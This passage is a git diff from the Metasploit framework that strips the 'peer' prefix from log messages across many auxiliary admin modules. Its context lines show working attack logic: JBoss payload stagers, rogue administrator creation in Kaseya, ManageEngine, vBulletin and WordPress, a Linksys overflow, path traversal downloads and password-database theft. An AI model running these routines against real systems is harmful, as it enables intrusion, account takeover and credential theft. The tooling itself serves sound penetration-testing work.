rand(8)) stager_contents = stager_jsp(app_base) opts = { @@ -69,37 +69,37 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(bsh_payload) if package.nil? - print_error("#{peer} - Deployment failed") + print_error("Deployment failed") return else - print_good("#{peer} - Deployment successful") + print_good("Deployment successful") end unless http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}" - print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...") + print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri) if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Remove the stager - print_status("#{peer} - Removing stager...") + print_status("Removing stager...") files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? - print_error("#{peer} - Unable to remove Stager") + print_error("Unable to remove Stager") else - print_good("#{peer} - Stager successfully removed") + print_good("Stager successfully removed") end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary def undeploy_action(app_base) # Undeploy the WAR and the stager if needed - print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") + print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(delete_script) if package.nil? - print_error("#{peer} - Unable to remove WAR") + print_error("Unable to remove WAR") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 64cbb4fa8b..a427ac2009 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary stager_contents = stager_jsp_with_payload(app_base, encoded_payload) if http_verb == 'POST' - print_status("#{peer} - Deploying stager for the WAR file...") + print_status("Deploying stager for the WAR file...") res = upload_file(stager_base, stager_jsp_name, stager_contents) else - print_status("#{peer} - Deploying minimal stager to upload the payload...") + print_status("Deploying minimal stager to upload the payload...") head_stager_jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name) head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp" @@ -79,20 +79,20 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, "Failed to deploy") end - print_status("#{peer} - Calling stager to deploy the payload warfile (might take some time)") + print_status("Calling stager to deploy the payload warfile (might take some time)") stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp' stager_res = deploy('uri' => stager_uri, 'method' => 'GET') if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Cleaning stagers - print_status("#{peer} - Undeploying stagers via DeploymentFileRepository.remove()...") - print_status("#{peer} - This might take some time, be patient...") if http_verb == "HEAD" + print_status("Undeploying stagers via DeploymentFileRepository.remove()...") + print_status("This might take some time, be patient...") if http_verb == "HEAD" delete_res = [] if head_stager_jsp_name delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp') @@ -101,28 +101,28 @@ class Metasploit3 < Msf::Auxiliary delete_res << delete_file('./', stager_base + '.war', '') delete_res.each do |res| if !res - print_warning("#{peer} - Unable to remove WAR [No Response]") + print_warning("Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_warning("#{peer} - WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end end # Undeploy the WAR and the stager if needed def undeploy_action(app_base) - print_status("#{peer} - Undeploying #{app_base} via DeploymentFileRepository.remove()...") + print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...") print_status("This might take some time, be patient...") if http_verb == "HEAD" res = delete_file('./', app_base + '.war', '') unless res - print_error("#{peer} - Unable to remove WAR (no response)") + print_error("Unable to remove WAR (no response)") return end if res.code < 200 || res.code >= 300 - print_error("#{peer} - Unable to remove WAR [#{res.code} #{res.message}]") + print_error("Unable to remove WAR [#{res.code} #{res.message}]") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index 5703684ca9..d7046167c7 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -53,11 +53,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/ session_val = $1 else - print_error("#{peer} - Failed to get sessionVal") + print_error("Failed to get sessionVal") return end - print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account") + print_status("Got sessionVal #{session_val}, creating Master Administrator account") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'), @@ -73,11 +73,11 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp') - print_error("#{peer} - Master Administrator account creation failed") + print_error("Master Administrator account creation failed") return end - print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") + print_good("Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index e3acc7bf4b..f5b371da2b 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -34,20 +34,20 @@ class Metasploit3 < Msf::Auxiliary end def check_login(user) - print_status("#{peer} - Trying to login with #{user} and empty password") + print_status("Trying to login with #{user} and empty password") res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,"") }) if res.nil? || res.code == 404 - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false elsif [200, 301, 302].include?(res.code) - print_good("#{peer} - Successful login #{user} and empty password") + print_good("Successful login #{user} and empty password") return true else - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false end end @@ -56,15 +56,15 @@ class Metasploit3 < Msf::Auxiliary begin if check_login("admin") - print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.") + print_good("login with user admin and no password possible. There is no need to use this module.") return end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end - print_status("#{peer} - Resetting password for the admin user ...") + print_status("Resetting password for the admin user ...") postdata = Rex::Text.rand_text_alpha(246) # Filler postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory @@ -94,15 +94,15 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 if check_login("admin") - print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password") + print_good("Expected answer and the login was successful. Try to login with the user admin and a blank password") else - print_status("#{peer} - Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") + print_status("Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") end else - print_error("#{peer} - Unexpected answer. Exploit attempt has failed") + print_error("Unexpected answer. Exploit attempt has failed") end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end end diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 06f5ffceca..871d6c8830 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary # Yes, "sucess" is really mispelt, as is "Servelet" ... ! unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/ - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end - print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index cf33a28787..9d782c370c 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -182,14 +182,14 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 else cookie = get_cookie end if cookie.nil? - print_error("#{peer} - Failed to get application cookies!") + print_error("Failed to get application cookies!") return end @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Listing directory #{datastore['DIRECTORY']}") + print_status("Listing directory #{datastore['DIRECTORY']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File with directory listing saved in: #{path}") else - print_error("#{peer} - Failed to list directory.") + print_error("Failed to list directory.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 49331f2752..fe04617a13 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 if cookie.nil? - print_error("#{peer} - Failed to login to IT360!") + print_error("Failed to login to IT360!") return end else @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or is empty.") + print_error("0 bytes returned, file does not exist or is empty.") return end @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5fa29d0f9c..0dc6890946 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def run unless check == Exploit::CheckCode::Appears - print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + print_error("Fingerprint hasn't been successful, trying to exploit anyway...") end version = get_version @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary creds = inject_sql(version < 7000 ? true : false) username = creds[0] password = creds[1] - print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + print_good("Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) @@ -241,10 +241,10 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_status("#{peer} - Reporting Super Administrator credentials...") + print_status("Reporting Super Administrator credentials...") report_super_admin_creds(username, password) - print_status("#{peer} - Leaking Password database...") + print_status("Leaking Password database...") loot_passwords(cookie_su) end @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + print_good("Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' loot_type = 'text/csv' loot_filename = 'manageengine_pmp_password_db.csv' @@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary res.body, loot_filename, loot_desc) - print_status("#{peer} - Password database saved in: #{p}") + print_status("Password database saved in: #{p}") else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") + print_error("Failed to export Password Manager Pro passwords.") end end end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 23df8b7b73..d42ee31992 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Copying file to Web location...") + print_status("Copying file to Web location...") dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" res = send_request_cgi( @@ -86,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} copied to #{dst_path} successfully") + print_good("File #{file} copied to #{dst_path} successfully") else - print_error("#{peer} - Failed to copy #{file} to #{dst_path}") + print_error("Failed to copy #{file} to #{dst_path}") end - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -101,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end # Cleanup @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 8e147f4927..5b920ae2c0 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -46,21 +46,21 @@ class Metasploit3 < Msf::Auxiliary def run # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'), 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }, }) rescue Rex::ConnectionError - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end # Show data if needed if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + print_error("0 bytes returned, file does not exist or it is empty.") return end vprint_line(res.body.to_s) @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 9158af9b7e..f7e8ee50c1 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -44,16 +44,16 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to access the configuration of the device") + print_status("Trying to access the configuration of the device") # extract device details action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' - print_status("#{peer} - Extracting Firmware version...") + print_status("Extracting Firmware version...") extract_data(action) # extract credentials action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo' - print_status("#{peer} - Extracting credentials...") + print_status("Extracting credentials...") extract_data(action) end @@ -75,26 +75,26 @@ class Metasploit3 < Msf::Auxiliary return if res.headers['Server'] !~ /Linux\/2.6.15 uhttpd\/1.0.0 soap\/1.0/ if res.body =~ /<NewPassword>(.*)<\/NewPassword>/ - print_status("#{peer} - Credentials found, extracting...") + print_status("Credentials found, extracting...") extract_credentials(res.body) end if res.body =~ /<ModelName>(.*)<\/ModelName>/ model_name = $1 - print_good("#{peer} - Model #{model_name} found") + print_good("Model #{model_name} found") end if res.body =~ /<Firmwareversion>(.*)<\/Firmwareversion>/ firmware_version = $1 - print_good("#{peer} - Firmware version #{firmware_version} found") + print_good("Firmware version #{firmware_version} found") #store all details as loot loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body) - print_good("#{peer} - Device details downloaded to: #{loot}") + print_good("Device details downloaded to: #{loot}") end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary body.each_line do |line| if line =~ /<NewPassword>(.*)<\/NewPassword>/ pass = $1 - print_good("#{peer} - admin / #{pass} credentials found") + print_good("admin / #{pass} credentials found") service_data = { address: rhost, @@ -137,6 +137,6 @@ class Metasploit3 < Msf::Auxiliary # store all details as loot loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body) - print_good("#{peer} - Account details downloaded to: #{loot}") + print_good("Account details downloaded to: #{loot}") end end diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 8a7c25a70e..6a12988779 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Trying to delete #{datastore['RPATH']}...") + print_status("Trying to delete #{datastore['RPATH']}...") res = send_request_cgi( { @@ -57,9 +57,9 @@ class Metasploit3 < Msf::Auxiliary }, 5) if res and res.code == 200 and res.body =~ /<RESULT><VERSION>1<\/VERSION><STATUS>0<\/STATUS><TRANSID>0<\/TRANSID><\/RESULT>/ - print_good("#{peer} - File #{datastore['RPATH']} successfully deleted") + print_good("File #{datastore['RPATH']} successfully deleted") else - print_error("#{peer} - File not deleted") + print_error("File not deleted") end end diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index d95a6c2802..ee19d364b1 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << file travs << "%00" - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") + print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") if is_proficy? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found") + print_error("Sophos Web Protect Appliance vulnerable component not found") return end contents = read_file(datastore['FILEPATH']) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index be790a49dd..ed9226caa4 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.code == 200 && res.body.to_s =~ /Error while creating account/ # No way to know whether this worked or not, it always says error - print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") + print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") service_data = { address: rhost, port: rport, @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) else - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end end end diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index e11ccfc8ae..f010b3f631 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end def get_traversal_path - print_status("#{peer} - Trying to find out the traversal path...") + print_status("Trying to find out the traversal path...") large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary }, }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.') end - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/ file_path = $3 else @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary traversal_path = get_traversal_path if traversal_path.nil? - print_error("#{peer} - Could not get traversal path, using bruteforce to download the file") + print_error("Could not get traversal path, using bruteforce to download the file") count = 1 while count < 15 res = download_file(('../' * count) + file_path) diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a219171e5..308d928a81 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end - print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") + print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index b9efc4ae7f..bba990712d 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Auxiliary def run if user == pass - print_error("#{peer} - Please select a password different than the username") + print_error("Please select a password different than the username") return end - print_status("#{peer} - Trying a new admin vBulletin account...") + print_status("Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /Administrator account created/ - print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") + print_good("Admin account with credentials #{user}:#{pass} successfully created") report_cred( ip: rhost, port: rport, @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary proof: res.body ) else - print_error("#{peer} - Admin account creation failed") + print_error("Admin account creation failed") end end end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index b86b2ee014..21cb5b66ce 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Auxiliary username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) - print_status("#{peer} - Trying to get table_prefix") + print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? - print_error("#{peer} - Unable to get table_prefix") + print_error("Unable to get table_prefix") return else - print_status("#{peer} - got table_prefix '#{table_prefix}'") + print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s - print_status("#{peer} - Inserting user #{username} with password #{password}") + print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # login successfull if cookie - print_status("#{peer} - User #{username} with password #{password} successfully created") + print_status("User #{username} with password #{password} successfully created") report_cred( ip: rhost, port: rport, @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary proof: cookie ) else - print_error("#{peer} - User creation failed") + print_error("User creation failed") return end end diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 2a8c26fba6..4051e0baa5 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -65,44 +65,44 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") elsif res.code != 200 - vprint_warning("#{peer} - Server responded with status code #{res.code}") + vprint_warning("Server responded with status code #{res.code}") end res end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) if cookie.nil? - print_error("#{peer} - Failed to authenticate with WordPress") + print_error("Failed to authenticate with WordPress") return end - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? - print_error("#{peer} - Failed to change the admin e-mail address") + print_error("Failed to change the admin e-mail address") return end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? - print_error("#{peer} - Failed to enable user registrations") + print_error("Failed to enable user registrations") return end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? - print_error("#{peer} - Failed to set the default user role") + print_error("Failed to set the default user role") return end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end 